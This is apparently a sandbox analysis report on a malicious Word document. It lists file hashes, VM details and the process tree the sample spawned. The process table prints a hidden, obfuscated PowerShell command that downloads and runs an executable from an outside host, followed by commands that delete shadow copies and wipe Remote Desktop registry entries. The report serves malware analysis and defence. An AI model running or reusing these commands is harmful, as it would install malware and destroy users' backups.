Field | Value |
---|---|
Creation Time | 2017-09-07 18:14 (UTC+2) |
VM Analysis Duration Time | 00:15:25 |
Execution Successful | |
Sample Filename | 69234490.doc |
Command Line Parameters | |
Prescript | |
Number of Processes | 10 |
Termination Reason | Timeout |
Field | Value |
---|---|
VTI Score | 100 / 100 |
VTI Database Version | 2.6 |
VTI Rule Match Count | 2124 |
VTI Rule Type | Documents |
Analysis Notice |
---|
The operating system was rebooted during the analysis. |
The maximum number of extracted files was reached during the analysis. Some files may be missing in the reports. You can increase the limit in the configuration. |
The dump total size limit was reached during the analysis. Some memory dumps may be missing in the reports. You can increase the limit in the configuration. |
ID | PID | Monitor Reason | Integrity Level | Image Name | Command Line | Origin ID |
---|---|---|---|---|---|---|
#1 | 0x908 | Analysis Target | Medium | winword.exe | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" | |
#2 | 0xbb0 | Child Process | Medium | powershell.exe | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $nJThd = new-object System.Net.WebClient;$kNpOYqxzAkL = new-object random;$str = 'http://test.top/admin.php?f=2 ,http://test.top/admin.php?f=2 ' -replace 'test', 'weekendfakc'; $kCeRq = $str.Split(',');$name = $kNpOYqxzAkL.next(1, 65536);$CQxUPWselP = $env:temp + '' + $name + '.exe';foreach($dOpZTR in $kCeRq){try{$nJThd.DownloadFile($dOpZTR.ToString(), $CQxUPWselP);Start-Process $CQxUPWselP;break;}catch{write-host $_.Exception.Message;}} | #1 |
#3 | 0x868 | Child Process | Medium | temp13684.exe | "C:\Users\YBZ8BT~1\AppData\Local\Temp13684.exe" | #2 |
#4 | 0x670 | Autostart | Medium | temp13684.exe | "C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\Temp13684.exe" | |
#5 | 0x30c | Child Process | Medium | cmd.exe | cmd /c C:\Users\YBZ8BT~1\AppData\Local\Temp\tmp81BC.tmp.bat | #4 |
#6 | 0x480 | Child Process | Medium | vssadmin.exe | vssadmin.exe Delete Shadows /All /Quiet | #5 |
#7 | 0x77c | Child Process | Medium | reg.exe | reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f | #5 |
#8 | 0x764 | Child Process | Medium | reg.exe | reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f | #5 |
#9 | 0x78c | Child Process | Medium | reg.exe | reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" | #5 |
#10 | 0x648 | Child Process | Medium | attrib.exe | attrib Default.rdp -s -h | #5 |
Field | Value |
---|---|
ID | #17650 |
MD5 Hash Value | 5975014ccde7296da4989a01e1471e92 |
SHA1 Hash Value | 499a74573cf6aaa8e79c05d1b6d59dbbfb7402e1 |
SHA256 Hash Value | fec85bce338245403956637218c76db743748306c89f7ee7830af65ad17f62db |
Filename | 69234490.doc |
File Size | 74.06 KB (75837 bytes) |
File Type | Word Document |
Has VBA Macros | |
Analyzer Version | 2.2.0 |
Analyzer Build Date | 2017-08-21 12:23 |
Microsoft Office Version | 2010 |
Microsoft Word Version | 14.0.4762.1000 |
Internet Explorer Version | 8.0.7601.17514 |
Chrome Version | 59.0.3071.109 |
Firefox Version | 25.0 |
Flash Version | 10.3.183.86 |
Java Version | 7.0.600 |
VM Name | win7_64_sp1-mso2010 |
VM Architecture | x86 64-bit |
VM OS | Windows 7 |
VM Kernel Version | 6.1.7601.17514 (3844dbb9-2017-4967-be7a-a4a2c20430fa) |